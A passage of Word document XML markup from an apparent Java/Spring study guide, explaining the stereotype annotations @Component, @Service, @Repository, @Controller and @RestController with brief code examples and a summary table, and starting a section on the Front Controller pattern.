        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235490B"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01402150"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public class MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AA659"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    // business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC6539"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38240639" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. @Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F97FA" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1861"/>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The @Service annotation is a specialization of @Component and is typically used to annotate service layer classes in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46463D1E" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1861"/>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It is used for defining service beans, which typically contain business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA385F0" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1861"/>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Though @Service does not add any specific functionality compared to @Component, it helps to indicate the role of the class in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F55FA18"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70681D25"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532F7A5"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public class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5361A9"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    public void createUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD67FBC"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        // business logic to create user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF4C80"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656B86C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EDCCB1" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. @Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D28AC1" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1862"/>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The @Repository annotation is a specialization of @Component and is typically used to annotate classes that interact with the database or data access layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021C988" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1862"/>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It serves to indicate that the class is responsible for database interactions, typically through CRUD (Create, Read, Update, Delete) operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D41D2" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1862"/>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Repository also enables certain exception translation mechanisms in Spring, converting database-related exceptions into Spring’s unchecked DataAccessException hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1812DFD8"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722310B"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Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C04916"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public class UserRepository {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0C5E2"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    // methods for database access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74305E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467041A4" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. @Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9312F5" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1863"/>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The @Controller annotation is a specialization of @Component used in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web layer</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Spring application (typically in a Spring MVC-based application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B2DCD" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1863"/>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It is used to define a controller that handles web requests and returns responses to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328E16C" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1863"/>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A class annotated with @Controller typically contains methods that are mapped to web request paths via @RequestMapping or similar annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CBECF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10C51F"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D66F966"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public class UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A8E4E"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    @RequestMapping("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B20E6C"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    public String getUsers(Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFEEAC"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        // controller logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4011F"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        return "userList";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203BDB6B"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D6845"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2175F516" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548148C" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1864"/>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The @RestController annotation is a specialized version of @Controller used in </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful web services</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79492A9A" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1864"/>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It is a convenience annotation that combines @Controller and @ResponseBody, which means that the methods inside the class will return JSON or XML (depending on configuration) directly as HTTP response bodies instead of views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F45DCB" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1864"/>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It is used for building RESTful web services that provide data (usually in JSON format) over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BEF45C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B14F6E"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440F8EA"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public class UserRestController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A0D90"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    @GetMapping("/api/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50071E02"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    public List&lt;User&gt; getUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17249E"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        return userService.getUsers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE49ED5"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE3EA1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA55385" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of Stereotype Annot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3"/>
        <w:gridCol w:w="5240"/>
        <w:gridCol w:w="3401"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="04DCC89F" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3781F586" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C67DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FB4F837" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C67DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA303FD" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C67DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="689A8E4C" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250928B8"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6BF415"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Generic annotation to define a Spring bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="277FB048"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Any Spring-managed component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="27B2CAD7" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C51F924"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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FCF9366"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Specialization of @Component for service layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1956882C"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Service classes containing business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="3D33C729" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="111C5F31"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Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="087CA06A"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Specialization of @Component for data access layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3022AC2B"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Data access classes (DAO/Repository)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="0C174290" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066C4C0F"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Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03AE9EF7"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Specialization of @Component for web controllers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D151018"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Web layer classes in Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="5C7C0E63" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7361399E"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RestController</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73EC6226"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Combination of @Controller and @ResponseBody for REST APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E7E4078"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REST API controllers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E40E128" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A724E" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944"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These </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stereotype annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@Component, @Service, @Repository, @Controller, @RestController) provide a clear indication of the role of the class in the application. They simplify Spring’s component scanning and help organize and structure the application’s layers. By using these annotations, developers can easily mark classes according to their functionality, ensuring better code readability and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6DAB5" w14:textId="48F021D8" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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FCDE5A7">
          <v:rect id="_x0000_i2107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425C864" w14:textId="493AEE46" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="002265DF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="_Toc196307918"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the front controller</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w14:paraId="28146D48" w14:textId="7E29205D" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Front Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design pattern used in web applications, particularly in the context of </w:t>
      </w:r>
